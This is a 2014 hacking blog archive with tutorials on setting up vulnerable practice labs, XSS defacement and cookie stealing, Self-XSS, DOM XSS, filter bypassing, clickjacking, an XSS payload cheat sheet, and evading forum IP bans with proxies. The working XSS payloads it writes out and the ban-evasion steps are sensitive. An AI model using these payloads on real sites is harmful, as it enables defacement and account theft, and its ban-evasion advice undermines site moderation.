Posts

Showing posts from August, 2014

Set up your own Lab for practicing SQL injection and XSS : Ethical Hacking

Image
I hope you learned about the Sql injection and XSS from BTS.  But you may curious to practice the SQLi and XSS attacks. we know that doing the attack on third-party website is crime.  So how can we do the practice? Here is the solution for you friends. Why shouldn't set up your own web application ? Yes, you can setup your own Pen Testing lab for practicing the XSS and SQLi vulnerabilities. When i surf in the internet, i come to know about the  " Damn Vulnerable Web App (DVWA) ".  It is one of web application that used for practicing your Ethical hacking/Pen Testing skills in legal way. Download this web Application from here: http://www.dvwa.co.uk/ For Installing the this application, you will need XAMPP server. The installation procedure : Using this application , you can also practice: LFI /RFI (File Inclusion methods) Command Execution Upload Script Login Brute Force if you have any doubts, check their wiki page or comment here.

Ethical Hacking Lab to Test and Learn SQL injection,XSS, CSRF Vulnerability

Image
By Parth So far i have provided few Web Application Pen Testing tutorials .  Now it is time to for practicing your hacking / pentesting skills in legal way. Last time , i explained about the  Damn Vulnerable  Web Application (DVWA). Now, i've come with different web application that will help you to improve your knowledge in web app pentesting. The BodgeIt Store Like DVWA, This is also a Vulnerable web Application that will help you to develop your skills in Pen testing. With this Vulnerable Application , you can practice the Following attacks: Cross Site Scripting (XSS) SQL injection (SQLi) Hidden (but unprotected) content Cross Site Request Forgery Debug code Insecure Object References Application logic vulnerabilities There is also a 'scoring' page (linked from the 'About Us' page) where you can see various hacking challenges and whether you have completed them or not. How to setup the Pen Testing Lab?  Requirements: BodgeIt app( download ) T...

How to deface website with Cross Site Scripting ? : Complete XSS Tutorial

Image
This is my third article about Cross site Scripting Tutorial. Last time, i explained how to do vulnerability test for XSS  and some  filter bypassing technique . Now let us see how a hacker deface a website with XSS vulnerability? Never implement this technique. I am just explaining it for educational purpose only. Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it's bad idea..! Script for chaning the background Color of a website: <script>document.body.bgColor="red";</script> Script for chaning the background image of a website: <script>document.body.background=" http://your_image.jpg ";</script> Defacement Page with Pastehtml: First of all upload some defacement page(html) to pastehtml.com and get the link. When you find a XSS ...

How to do Cookie Stealing with Cross site Scripting Vulnerability ? : XSS Tutorials

Image
By Parth Hope, you are now familiar with XSS vulnerability (if you don't know what it is, read the  beginners xss tutorial ). It is my Fourth article about the XSS Vulnerability Testing(PenTesting)..! Today i am going to explain how an attacker exploit XSS vulnerability and steal cookie from users. Warning!!! BTS does not take responsibility, if anyone, tries these hacks against any organization or whatever that makes him to trespass the security measures and brings him under the legal prosecution. This tutorial is intended for the improvement of security and for PenTesting,  investigations by legal security agencies. Requirements: A cookie Stealer code : Get it from  here Free Web hosting service Basic Knowledge about XSS Basic Knowledge about  Computer Cookies Cookie stealing is the process of exploiting the XSS vulnerability (Non-persistent/persistent) and steal the cookie from the victim who visit the infected link. These cookie will be used t...

XSS attacks practical examples ~ Cross site Scripting Exploits

Image
By Parth Hello BTS readers,  So far i explained about  XSS attacks and risks of this vulnerability ; also i have provided guide to setup your own pentesting lab(using dvwa) to practice XSS attacks. Dvwa is limited to few xss methods.  You may curious to know more about the practical examples for the XSS attacks. eHackingNews will help you to know more about the latest XSS attacks. The  XSS Vulnerability  section in the EhackingNews covers the latest XSS attacks submitted by Security Experts and GreyHat hackers. This will give you an idea about the xss attack. Recent report from EHN:  Ubuntu website is vulnerable to XSS attack.

Self-XSS (Cross Site Scripting) ~ Social Engineering Attack and Prevention

Image
Last time , I have explained about the  Clickjacking attack and prevention .  Today,  i am going to explain about the Self-XSS(Cross Site Scripting) Attack What is Self-XSS? Self-XSS is one of the popular Social Engineering Attack used by Attackers to trick users into paste the malicious code in browser.  Results in attacker accessing to the whatever website you visit. Usually scammers use this attack for tricking users to buy products or get money through online survey . Recently,  Hackers Attacked Facebook with explicit hardcore porn images . Facebook says it might be self-Xss Attack . Javascript can be executed in browser url bar. For example , enter the following code in your browser: javascript:alert('BreakTheSecurity'); This will show a pop up box with "BreakTheSecurity".  An attacker can use this for malicious purpose. He can steal Confidential data, cookies, redirect to malware sites and more. For Eg: Entering the followi...

Bypassing the XSS Filters : Advanced XSS Tutorials for Web application Pen Testing

Image
copyrights reserved © BreakTheSecurity Hi friends, last time, i explained  what is XSS  and how an attacker can inject malicious script in your site. As i promised earlier, i am writing this advanced XSS tutorial for you(still more articles will come). Sometimes, website owner use XSS filters(WAF) to protect against XSS vulnerability. For eg: if you put the <scirpt>alert("hi")</script> , the Filter will escape the "(quote) character , so the script will become <script>alert(>xss detected<)</script> Now this script won't work. Likewise Filters use different type of filtering method to give protection against the XSS.  In this case, we can use some tricks to bypass the filter.  Here i am going to cover that only. 1.Bypassing magic_quotes_gpc The magic_quotes_gpc=ON is a PHP setting(configured in PHP.ini File) , it escapes the every ' (single-quote), " (double quote) and \  with a backslash automatically. For Eg: ...

DOM Based Cross Site Scripting(XSS) vulnerability Tutorial

Image
By Parth So far i have explained about the Traditional Cross site scripting that occurs because of insecure server-side code. In this post , i am going to explain the DOM Based Cross Site Scripting vulnerability. if you don't know what is cross site scripting , then i recommend you to read the basics from  here . Before explaining about the DOM based xss, let me explain what DOM means to. What is DOM? DOM is expanded as  Document object model  that allows client-side-scripts(Eg: Javascript) to dynamically access and modify the content, structure, and style of a webpage. Like server-side scripts, client-side scripts can also accept and manipulate user input with the help of DOM. Here is a very simple HTML code that accepts and writes user input using JavaScript with the help of DOM. <html> <head> </head> <body> <script> var pos=document.URL.indexOf(" BTSinput =")+9; //finds the position of value var userInput=document....

ACCESS BLOCKED WEBSITES IN YOUR COLLEGE/OFFICE WI-FI

Image
By Parth Makadiya I got few mails asking for some tricks to access restricted websites in college or office Wi-Fi without using proxy. Generally, if you use proxy to access some website then it might take you some more time to load the page than usual, but a VPN connection rather will improve your speed. In this article I will be helping you to set up a free VPN account for unlimited access to often blocked websites like Torrents, Facebook and YouTube.  And then you have some more plus points like you can manage your downloads, that is, you can pause them (if you are under a Wi-Fi network then you won’t be able to pause your downloads, well, in most of them) and you can also be able to perform video call using Skype or some other alternate service. Note that the password will be changed every few hours so you have to visit the VPN service provider’s webpage for the password and reconnect using your new VPN credentials. There are many VPN service providers, just Google them...

What is Clickjacking Attack? How to Prevent? | UI Redressing

Image
By PM Will answering simple maths quiz delete your Social Network account?  If your answer is "No", then check this news  Linkedin Clickjacking Vulnerability  and come back.  Will visiting a website turn on your webcam? The answer is "Yes".  Check this  Flash player clickjacking vulnerability . If you read above news completely, It will be easy for you to understand  what is clickjacking.  Ok, lets continue to our Article. Clickjacking also known as UI Redressing,is one of Malicious Technique tricking users to click the button/image that will run hidden malicious script from another site. An attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the innocuous page. Thus an attacker hijack the click to another website.  That's why it is known as Clickjacking(Click+Hijacking).  The term "clickjacking" was coined by Jeremia...

Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability

Image
By Parth MAkadiya What is XSS? Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users. In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms. Example : Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password. It will be easy to understand XSS , if you have the following prerequisite: Strong Knowledge i...

Complete Cross site Scripting(XSS) cheat sheets : Part 1

By Parth Makadiya I am just providing this XSS Cheat sheet after collecting the exploit-codes from hackers' techniques and different sites especially http://ha.ckers.org/xss.html .  This is complete list of XSS cheat codes which will help you to test xss vulnerabilities ,useful for bypassing the filters.  If you have any different cheat codes , please send your code. Basic XSS codes: ---------------------------------- <script>alert("XSS")</script> <script>alert("XSS");</script> <script>alert('XSS')</script> "><script>alert("XSS")</script> <script>alert(/XSS")</script> <script>alert(/XSS/)</script> When inside Script tag: --------------------------------- </script><script>alert(1)</script> ‘; alert(1); ')alert(1);// Bypassing with toggle case: --------------------------------------  <ScRiPt>alert(1)</sCr...

Register with another ip in forum,if you banned

Image
Is your ip address banned in any forum or website? Can not you create account or login to your account?   Don't worry i am here to help you to create a new account.   Also You can have multiple accounts in forum. How can you register after banned? You can change your ip address. Visit from another ip and register the account.  Whenever you want to login to that forum or website hide ip address in simple way. Don't use your old mail id or any other old details.  Create new one. For Multiple Accounts: If you want multiple accounts in forum ,what you have to do?  First register one account with one ip.  Then register another account with another ip.  likewise do registration.  If you want to login ,follow same procedure and use unique ip address for each account. How to change ip address? I gave you list of proxy servers here:  Proxy Server ip address list Use those proxy server. If you don't know how to use those proxy serve...

Hacking Any Facebook Accounts using REST API

Image
By Parth Makadiya Sponsored Links Stephen Sclafani , a Security Researcher, has discovered a critical security vulnerability in the Social Networking giant Facebook that allowed him to hack any facebook accounts. Stephen  just  need  your user ID,  he   can hack into your account and read private messages, view email addresses, create or delete notes, on top of that he can update status and upload photos and tag you friends,  on behalf you.  "A misconfigured endpoint allowed legacy REST API calls to be made on behalf of any Facebook user using only their user ID" Stephen explained in his  blog . The Facebook REST API is said to be predecessor of Facebook’s current Graph API.  He managed to send request to server using this API such that it will update status on behalf of victim. Stephen found this bug in April 23 and reported to Facebook.  After getting notification, Facebook permanently fixed the bug on April 30th. Faceboo...